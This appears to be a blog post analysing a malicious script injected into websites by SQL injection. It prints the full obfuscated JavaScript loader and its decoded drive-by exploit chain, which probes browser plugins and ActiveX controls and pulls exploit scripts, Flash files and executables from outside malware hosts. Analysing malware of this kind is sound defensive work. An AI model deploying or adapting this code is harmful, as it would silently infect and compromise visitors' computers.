chanm.cn/a.js

another sql injected domain discovered http://chanm.cn/a.js

other than 51yes.com counter iframe, the following iframe was embedded in a.js
<iframe src=http://www.gogo111.net/dl6.htm?Seraph width=0 height=0></iframe>
which embeds another iframe
<iframe src=news.html width=100 height=0></iframe>

Content of news.html


<script>window.onerror=function(){return true;}</script>
<script>
/*Extreme*/
window.defaultStatus="Íê³É";
Status="utf8to16";
function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
function base64decode(str)
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
function xxtea_decrypt(str,key){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
t="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";
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0=4(5(3(0),\'\\2\\1\\6\\d\\7\'));c["\\b\\a\\8\\9"](0);',14,14,'t|x75|x66|base64decode|utf8to16|xxtea_decrypt|x63|x31|x61|x6c|x76|x65|window|x6b'.split('|'),0,{}))
/*Extreme*/
</script>

The above obfuscated JS can be decoded as

try{var e;
var ado=(document.createElement("object"));
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http:\/\/user1.isee080.net\/ms06014.js><\/script>")}
else{
try{var f;
var Flashver = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9");}
catch(f){};
finally{if(f!="[object Error]"){
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain">');
document.write('<param name="movie" value="http://www.guccime.net/4561.swf">');
document.write('<param name="quality" value="high">');
document.write('<param name="bgcolor" value="#ffffff">');
document.write('<embed src="http://www.guccime.net/4561.swf">');
document.write('</object>');
}else{document.write("<EMBED src=http://www.guccime.net/4562.swf width=0 height=0>")}}}
try{var g;
var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src="http://user1.isee080.net/GLWORLD.html"></iframe>')}}
try{var h;
var real=new ActiveXObject("IERPCtl.IERPCtl.1");}
catch(h){};
finally{if(h!="[object Error]"){
if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/user1.isee080.net\/real.js><\/script>')}
else{document.write('<iframe style=display:none src="http://user1.isee080.net/Real.html"></iframe>')}}}
try{var i;
var Baidu=new ActiveXObject("BaiduBar.Tool");}
catch(i){};
finally{if(i!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://user1.isee080.net/Baidu.cab", "Baidu.exe", 0)}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]")
{
try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe width=100 height=0 src=http://user1.isee080.net/Thunder.html></iframe>')}catch(e){}
}}}

From the decoded js, it can be seen what applications it tries to exploit.

ms06014.js – downloads trojan from http://user1.12-26.net/bak.css which in turn downloads more trojans from http://softa.softkills.net/soft%5B0-36%5D.exe

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: